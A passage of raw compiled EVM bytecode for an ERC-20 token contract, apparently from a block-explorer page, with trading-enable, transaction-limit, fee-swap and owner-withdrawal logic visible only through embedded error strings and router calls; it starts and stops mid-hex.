519050919050565b600082825260208201905092915050565b60005b83811015612ae9578082015181840152602081019050612ace565b60008484015250505050565b6000601f19601f8301169050919050565b6000612b1182612aaf565b612b1b8185612aba565b9350612b2b818560208601612acb565b612b3481612af5565b840191505092915050565b60006020820190508181036000830152612b598184612b06565b905092915050565b600080fd5b612b6f81612a3f565b8114612b7a57600080fd5b50565b600081359050612b8c81612b66565b92915050565b600060208284031215612ba857612ba7612b61565b5b6000612bb684828501612b7d565b91505092915050565b612bc881612a7b565b8114612bd357600080fd5b50565b600081359050612be581612bbf565b92915050565b60008060408385031215612c0257612c01612b61565b5b6000612c1085828601612b7d565b9250506020612c2185828601612bd6565b9150509250929050565b60008115159050919050565b612c4081612c2b565b82525050565b6000602082019050612c5b6000830184612c37565b92915050565b6000819050919050565b6000612c86612c81612c7c84612a1f565b612c61565b612a1f565b9050919050565b6000612c9882612c6b565b9050919050565b6000612caa82612c8d565b9050919050565b612cba81612c9f565b82525050565b6000602082019050612cd56000830184612cb1565b92915050565b600080600060608486031215612cf457612cf3612b61565b5b6000612d0286828701612b7d565b9350506020612d1386828701612b7d565b9250506040612d2486828701612bd6565b9150509250925092565b600060ff82169050919050565b612d4481612d2e565b82525050565b6000602082019050612d5f6000830184612d3b565b92915050565b60008060408385031215612d7c57612d7b612b61565b5b6000612d8a85828601612b7d565b9250506020612d9b85828601612b7d565b9150509250929050565b612dae81612c2b565b8114612db957600080fd5b50565b600081359050612dcb81612da5565b92915050565b60008060408385031215612de857612de7612b61565b5b6000612df685828601612b7d565b9250506020612e0785828601612dbc565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602160045260246000fd5b60048110612e5157612e50612e11565b5b50565b6000819050612e6282612e40565b919050565b6000612e7282612e54565b9050919050565b612e8281612e67565b82525050565b6000602082019050612e9d6000830184612e79565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680612eea57607f821691505b602082108103612efd57612efc612ea3565b5b50919050565b600081519050612f1281612bbf565b92915050565b600060208284031215612f2e57612f2d612b61565b5b6000612f3c84828501612f03565b91505092915050565b6000604082019050612f5a6000830185612a51565b612f676020830184612a85565b9392505050565b600081519050612f7d81612da5565b92915050565b600060208284031215612f9957612f98612b61565b5b6000612fa784828501612f6e565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000612fea82612a7b565b9150612ff583612a7b565b925082820190508082111561300d5761300c612fb0565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061306f602583612aba565b915061307a82613013565b604082019050919050565b6000602082019050818103600083015261309e81613062565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6000815190506130e381612b66565b92915050565b6000602082840312156130ff576130fe612b61565b5b600061310d848285016130d4565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000819050919050565b600061316a61316561316084613145565b612c61565b612a7b565b9050919050565b61317a8161314f565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b6131b581612a3f565b82525050565b60006131c783836131ac565b60208301905092915050565b6000602082019050919050565b60006131eb82613180565b6131f5818561318b565b93506132008361319c565b8060005b8381101561323157815161321888826131bb565b9750613223836131d3565b925050600181019050613204565b5085935050505092915050565b60006080820190506132536000830187613171565b818103602083015261326581866131e0565b90506132746040830185612a51565b6132816060830184612a85565b95945050505050565b600060608201905061329f6000830186612a51565b6132ac6020830185612a51565b6132b96040830184612a85565b949350505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061331d602683612aba565b9150613328826132c1565b604082019050919050565b6000602082019050818103600083015261334c81613310565b9050919050565b60006040820190506133686000830185612a51565b6133756020830184612a51565b9392505050565b600060c0820190506133916000830189612a51565b61339e6020830188612a85565b6133ab6040830187613171565b6133b86060830186613171565b6133c56080830185612a51565b6133d260a0830184612a85565b979650505050505050565b6000806000606084860312156133f6576133f5612b61565b5b600061340486828701612f03565b935050602061341586828701612f03565b925050604061342686828701612f03565b9150509250925092565b7f54726164696e6720697320616c726561647920656e61626c6564000000000000600082015250565b6000613466601a83612aba565b915061347182613430565b602082019050919050565b6000602082019050818103600083015261349581613459565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006134d2602083612aba565b91506134dd8261349c565b602082019050919050565b60006020820190508181036000830152613501816134c5565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000613564602483612aba565b915061356f82613508565b604082019050919050565b6000602082019050818103600083015261359381613557565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006135f6602283612aba565b91506136018261359a565b604082019050919050565b60006020820190508181036000830152613625816135e9565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000613662601d83612aba565b915061366d8261362c565b602082019050919050565b6000602082019050818103600083015261369181613655565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006136f4602583612aba565b91506136ff82613698565b604082019050919050565b60006020820190508181036000830152613723816136e7565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000613786602383612aba565b91506137918261372a565b604082019050919050565b600060208201905081810360008301526137b581613779565b9050919050565b7f54726164696e67206e6f7420656e61626c656400000000000000000000000000600082015250565b60006137f2601383612aba565b91506137fd826137bc565b602082019050919050565b60006020820190508181036000830152613821816137e5565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473207460008201527f6865206d6178207472616e73616374696f6e20616d6f756e7420626566000000602082015250565b6000613884603d83612aba565b915061388f82613828565b604082019050919050565b600060208201905081810360008301526138b381613877565b9050919050565b7f45524332303a2062616c616e636520616d6f756e74206578636565646564206d60008201527f61782077616c6c657420616d6f756e74206c696d697400000000000000000000602082015250565b6000613916603683612aba565b9150613921826138ba565b604082019050919050565b6000602082019050818103600083015261394581613909565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473207460008201527f6865206d6178207472616e73616374696f6e20616d6f756e7400000000000000602082015250565b60006139a8603983612aba565b91506139b38261394c565b604082019050919050565b600060208201905081810360008301526139d78161399b565b9050919050565b60006139e982612a7b565b91506139f483612a7b565b9250828202613a0281612a7b565b91508282048414831517613a1957613a18612fb0565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000613a5a82612a7b565b9150613a6583612a7b565b925082613a7557613a74613a20565b5b828204905092915050565b6000613a8b82612a7b565b9150613a9683612a7b565b9250828203905081811115613aae57613aad612fb0565b5b92915050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000613b10602683612aba565b9150613b1b82613ab4565b604082019050919050565b60006020820190508181036000830152613b3f81613b03565b9050919050565b600060a082019050613b5b6000830188612a85565b613b686020830187612a85565b8181036040830152613b7a81866131e0565b9050613b896060830185612a51565b613b966080830184612a85565b969550505050505056fea2646970667358221220eba4147286b5c72f47f4788f521f2310c0e61b6a65a26a588a7b2d96421ad1bf64736f6c63430008130033

Deployed Bytecode

0x6080604052600436106102085760003560e01c80638baa824911610118578063cc41307f116100a0578063ef437ff51161006f578063ef437ff5146107a6578063f2fde38b146107cf578063f4029fc0146107f8578063fb201b1d14610802578063fca675a8146108195761020f565b8063cc41307f146106c6578063d931d7be146106ef578063dd62ed3e1461072c578063e5b37a65146107695761020f565b8063a014f37d116100e7578063a014f37d146105cb578063a457c2d7146105f6578063a9059cbb14610633578063aa4bde2814610670578063b61b64fa1461069b5761020f565b80638baa82491461050d5780638c0b5e221461054a5780638da5cb5b1461057557806395d89b41146105a05761020f565b8063313ce5671161019b57806349bd5a5e1161016a57806349bd5a5e1461044c57806354b762a61461047757806370a08231146104a2578063715018a6146104df578063751039fc146104f65761020f565b8063313ce5671461038e57806333ee1793146103b957806339509351146103e45780633eb5d9b2146104215761020f565b8063095ea7b3116101d7578063095ea7b3146102be5780631694505e146102fb57806318160ddd1461032657806323b872dd146103515761020f565b806303fd2a45146102145780630445b6671461023f57806306fdde031461026a5780630797ad6d146102955761020f565b3661020f57005b600080fd5b34801561022057600080fd5b50610229610844565b6040516102369190612a60565b60405180910390f35b34801561024b57600080fd5b5061025461086a565b6040516102619190612a94565b60405180910390f35b34801561027657600080fd5b5061027f610870565b60405161028c9190612b3f565b60405180910390f35b3480156102a157600080fd5b506102bc60048036038101906102b79190612b92565b610902565b005b3480156102ca57600080fd5b506102e560048036038101906102e09190612beb565b610a27565b6040516102f29190612c46565b60405180910390f35b34801561030757600080fd5b50610310610a4a565b60405161031d9190612cc0565b60405180910390f35b34801561033257600080fd5b5061033b610a6e565b6040516103489190612a94565b60405180910390f35b34801561035d57600080fd5b5061037860048036038101906103739190612cdb565b610a78565b6040516103859190612c46565b60405180910390f35b34801561039a57600080fd5b506103a3610aa7565b6040516103b09190612d4a565b60405180910390f35b3480156103c557600080fd5b506103ce610ab0565b6040516103db9190612a94565b60405180910390f35b3480156103f057600080fd5b5061040b60048036038101906104069190612beb565b610ab6565b6040516104189190612c46565b60405180910390f35b34801561042d57600080fd5b50610436610aed565b6040516104439190612a94565b60405180910390f35b34801561045857600080fd5b50610461610af3565b60405161046e9190612a60565b60405180910390f35b34801561048357600080fd5b5061048c610b19565b6040516104999190612c46565b60405180910390f35b3480156104ae57600080fd5b506104c960048036038101906104c49190612b92565b610b95565b6040516104d69190612a94565b60405180910390f35b3480156104eb57600080fd5b506104f4610bdd565b005b34801561050257600080fd5b5061050b610bf1565b005b34801561051957600080fd5b50610534600480360381019061052f9190612b92565b610c21565b6040516105419190612c46565b60405180910390f35b34801561055657600080fd5b5061055f610c41565b60405161056c9190612a94565b60405180910390f35b34801561058157600080fd5b5061058a610c47565b6040516105979190612a60565b60405180910390f35b3480156105ac57600080fd5b506105b5610c71565b6040516105c29190612b3f565b60405180910390f35b3480156105d757600080fd5b506105e0610d03565b6040516105ed9190612c46565b60405180910390f35b34801561060257600080fd5b5061061d60048036038101906106189190612beb565b610d4f565b60405161062a9190612c46565b60405180910390f35b34801561063f57600080fd5b5061065a60048036038101906106559190612beb565b610dc6565b6040516106679190612c46565b60405180910390f35b34801561067c57600080fd5b50610685610de9565b6040516106929190612a94565b60405180910390f35b3480156106a757600080fd5b506106b0610def565b6040516106bd9190612a94565b60405180910390f35b3480156106d257600080fd5b506106ed60048036038101906106e89190612beb565b610df5565b005b3480156106fb57600080fd5b5061071660048036038101906107119190612b92565b611125565b6040516107239190612c46565b60405180910390f35b34801561073857600080fd5b50610753600480360381019061074e9190612d65565b611145565b6040516107609190612a94565b60405180910390f35b34801561077557600080fd5b50610790600480360381019061078b9190612b92565b6111cc565b60405161079d9190612c46565b60405180910390f35b3480156107b257600080fd5b506107cd60048036038101906107c89190612dd1565b6111ec565b005b3480156107db57600080fd5b506107f660048036038101906107f19190612b92565b61124f565b005b6108006112d2565b005b34801561080e57600080fd5b506108176115bb565b005b34801561082557600080fd5b5061082e61164b565b60405161083b9190612e88565b60405180910390f35b600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600a5481565b60606003805461087f90612ed2565b80601f01602080910402602001604051908101604052809291908181526020018280546108ab90612ed2565b80156108f85780601f106108cd576101008083540402835291602001916108f8565b820191906000526020600020905b8154815290600101906020018083116108db57829003601f168201915b5050505050905090565b61090a61165e565b8073ffffffffffffffffffffffffffffffffffffffff1663a9059cbb600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b81526004016109829190612a60565b602060405180830381865afa15801561099f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109c39190612f18565b6040518363ffffffff1660e01b81526004016109e0929190612f45565b6020604051808303816000875af11580156109ff573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a239190612f83565b5050565b600080610a326116dc565b9050610a3f8185856116e4565b600191505092915050565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6000600254905090565b600080610a836116dc565b9050610a908582856118ad565b610a9b858585611939565b60019150509392505050565b60006012905090565b60125481565b600080610ac16116dc565b9050610ae2818585610ad38589611145565b610add9190612fdf565b6116e4565b600191505092915050565b60115481565b601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc6016549081150290604051600060405180830381858888f19350505050158015610b85573d6000803e3d6000fd5b5060006016819055506001905090565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610be561165e565b610bef60006122f3565b565b610bf961165e565b6b015bfc9298de952e2f4000006008819055506b015bfc9298de952e2f400000600981905550565b600f6020528060005260406000206000915054906101000a900460ff1681565b60085481565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610c8090612ed2565b80601f0160208091040260200160405190810160405280929190818152602001828054610cac90612ed2565b8015610cf95780601f10610cce57610100808354040283529160200191610cf9565b820191906000526020600020905b815481529060010190602001808311610cdc57829003601f168201915b5050505050905090565b6000610d0d61165e565b6003601060006101000a81548160ff02191690836003811115610d3357610d32612e11565b5b0217905550600060118190555060006012819055506001905090565b600080610d5a6116dc565b90506000610d688286611145565b905083811015610dad576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610da490613085565b60405180910390fd5b610dba82868684036116e4565b60019250505092915050565b600080610dd16116dc565b9050610dde818585611939565b600191505092915050565b60095481565b60165481565b6000600267ffffffffffffffff811115610e1257610e116130a5565b5b604051908082528060200260200182016040528015610e405781602001602082028036833780820191505090505b5090507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610eae573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ed291906130e9565b81600081518110610ee657610ee5613116565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250503081600181518110610f3557610f34613116565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600081600181518110610f8557610f84613116565b5b60200260200101519050600d60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611078577f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663b6f9de958460008588426040518663ffffffff1660e01b8152600401611041949392919061323e565b6000604051808303818588803b15801561105a57600080fd5b505af115801561106e573d6000803e3d6000fd5b505050505061111f565b61108284846123b9565b8073ffffffffffffffffffffffffffffffffffffffff166323b872dd85846001815181106110b3576110b2613116565b5b6020026020010151866040518463ffffffff1660e01b81526004016110da9392919061328a565b6020604051808303816000875af11580156110f9573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061111d9190612f83565b505b50505050565b600e6020528060005260406000206000915054906101000a900460ff1681565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600d6020528060005260406000206000915054906101000a900460ff1681565b6111f461165e565b80600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b61125761165e565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036112c6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112bd90613333565b60405180910390fd5b6112cf816122f3565b50565b6112da61165e565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015611345573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061136991906130e9565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156113f0573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061141491906130e9565b6040518363ffffffff1660e01b8152600401611431929190613353565b6020604051808303816000875af1158015611450573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061147491906130e9565b601460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506114ff307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6116e4565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663f305d719343061154630610b95565b600080611551610c47565b426040518863ffffffff1660e01b81526004016115739695949392919061337c565b60606040518083038185885af1158015611591573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906115b691906133dd565b505050565b6115c361165e565b601060029054906101000a900460ff1615611613576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160a9061347c565b60405180910390fd5b6001601060026101000a81548160ff0219169083151502179055506001601060036101000a81548160ff021916908315150217905550565b601060009054906101000a900460ff1681565b6116666116dc565b73ffffffffffffffffffffffffffffffffffffffff16611684610c47565b73ffffffffffffffffffffffffffffffffffffffff16146116da576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116d1906134e8565b60405180910390fd5b565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611753576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161174a9061357a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036117c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117b99061360c565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516118a09190612a94565b60405180910390a3505050565b60006118b98484611145565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146119335781811015611925576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161191c90613678565b60405180910390fd5b61193284848484036116e4565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036119a8576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161199f9061370a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611a17576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a0e9061379c565b60405180910390fd5b600d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015611abb5750600d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611b1057601060029054906101000a900460ff16611b0f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b0690613808565b60405180910390fd5b5b600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015611bb45750600e60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611cad57601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614611cac57600854811115611c53576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c4a9061389a565b60405180910390fd5b600954611c5f83610b95565b82611c6a9190612fdf565b1115611cab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ca29061392c565b60405180910390fd5b5b5b6000819050600d60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015611d565750600d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156122e257601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161480611e045750601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b156121f457600854821115611e4e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e45906139be565b60405180910390fd5b8373ffffffffffffffffffffffffffffffffffffffff16601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16148015611ef55750600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015611f2d57503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b15611fff5760006003811115611f4657611f45612e11565b5b601060009054906101000a900460ff166003811115611f6857611f67612e11565b5b03611fc6576001600f60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b6000606460115484611fd891906139de565b611fe29190613a4f565b9050611fef853083612407565b8083611ffb9190613a80565b9150505b8273ffffffffffffffffffffffffffffffffffffffff16601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161480156120a65750600e60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156120de57503073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b80156120f65750601060039054906101000a900460ff165b801561210f5750601060019054906101000a900460ff16155b156121ef576000601254905060011515600f60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161515036121795760135490505b6001601060016101000a81548160ff02191690831515021790555061219c61267d565b6000601060016101000a81548160ff0219169083151502179055506000606482856121c791906139de565b6121d19190613a4f565b90506121de863083612407565b80846121ea9190613a80565b925050505b6122e1565b60011515600f60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615151480156122a257508273ffffffffffffffffffffffffffffffffffffffff16601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b156122e05760006064601354846122b991906139de565b6122c39190613a4f565b90506122d0853083612407565b80836122dc9190613a80565b9150505b5b5b6122ed848483612407565b50505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600030905060006123ca8285611145565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146124015761240084838584036116e4565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612476576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161246d9061370a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036124e5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016124dc9061379c565b60405180910390fd5b6124f0838383612744565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015612576576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161256d90613b26565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516126649190612a94565b60405180910390a3612677848484612749565b50505050565b600061268830610b95565b03156127425760008061269a30610b95565b9050600047905060006126ce600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16610b95565b90506000600a5484111561273c574792506126ea84600061274e565b82476126f69190613a80565b9450600a54821115612722578061270e576000612710565b845b8561271b9190613a4f565b6016819055505b84601660008282546127349190612fdf565b925050819055505b50505050505b565b505050565b505050565b6000600267ffffffffffffffff81111561276b5761276a6130a5565b5b6040519080825280602002602001820160405280156127995781602001602082028036833780820191505090505b50905030816000815181106127b1576127b0613116565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612856573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061287a91906130e9565b8160018151811061288e5761288d613116565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250503073ffffffffffffffffffffffffffffffffffffffff1663095ea7b37f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b8152600401612943929190612f45565b6020604051808303816000875af1158015612962573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906129869190612f83565b507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663791ac94784848430426040518663ffffffff1660e01b81526004016129e8959493929190613b46565b600060405180830381600087803b158015612a0257600080fd5b505af1158015612a16573d6000803e3d6000fd5b50505050505050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000612a4a82612a1f565b9050919050565b612a5a81612a3f565b82525050565b6000602082019050612a756000830184612a51565b92915050565b6000819050919050565b612a8e81612a7b565b82525050565b6000602082019050612aa96000830184612a85565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015612ae9578082015181840152602081019050612ace565b60008484015250505050565b6000601f19601f8301169050919050565b6000612b1182612aaf565b612b1b8185612aba565b9350612b2b818560208601612acb565b612b3481612af5565b840191505092915050565b60006020820190508181036000830152612b598184612b06565b905092915050565b600080fd5b612b6f81612a3f565b8114612b7a57600080fd5b50565b600081359050612b8c81612b66565b92915050565b600060208284031215612ba857612ba7612b61565b5b6000612bb684828501612b7d565b91505092915050565b612bc881612a7b565b8114612bd357600080fd5b50565b600081359050612be581612bbf565b92915050565b60008060408385031215612c0257612c01612b61565b5b6000612c1085828601612b7d565b9250506020612c2185828601612bd6565b9150509250929050565b60008115159050919050565b612c4081612c2b565b82525050565b6000602082019050612c5b6000830184612c37565b92915050565b6000819050919050565b6000612c86612c81612c7c84612a1f565b612c61565b612a1f565b9050919050565b6000612c9882612c6b565b9050919050565b6000612caa82612c8d565b9050919050565b612cba81612c9f565b82525050565b6000602082019050612cd56000830184612cb1565b92915050565b600080600060608486031215612cf457612cf3612b61565b5b6000612d0286828701612b7d565b9350506020612d1386828701612b7d565b9250506040612d2486828701612bd6565b9150509250925092565b600060ff82169050919050565b612d4481612d2e565b82525050565b6000602082019050612d5f6000830184612d3b565b92915050565b60008060408385031215612d7c57612d7b612b61565b5b6000612d8a85828601612b7d565b9250506020612d9b85828601612b7d565b9150509250929050565b612dae81612c2b565b8114612db957600080fd5b50565b600081359050612dcb81612da5565b92915050565b60008060408385031215612de857612de7612b61565b5b6000612df685828601612b7d565b9250506020612e0785828601612dbc565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602160045260246000fd5b60048110612e5157612e50612e11565b5b50565b6000819050612e6282612e40565b919050565b6000612e7282612e54565b9050919050565b612e8281612e67565b82525050565b6000602082019050612e9d6000830184612e79565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680612eea57607f821691505b602082108103612efd57612efc612ea3565b5b50919050565b600081519050612f1281612bbf565b92915050565b600060208284031215612f2e57612f2d612b61565b5b6000612f3c84828501612f03565b91505092915050565b6000604082019050612f5a6000830185612a51565b612f676020830184612a85565b9392505050565b600081519050612f7d81612da5565b92915050565b600060208284031215612f9957612f9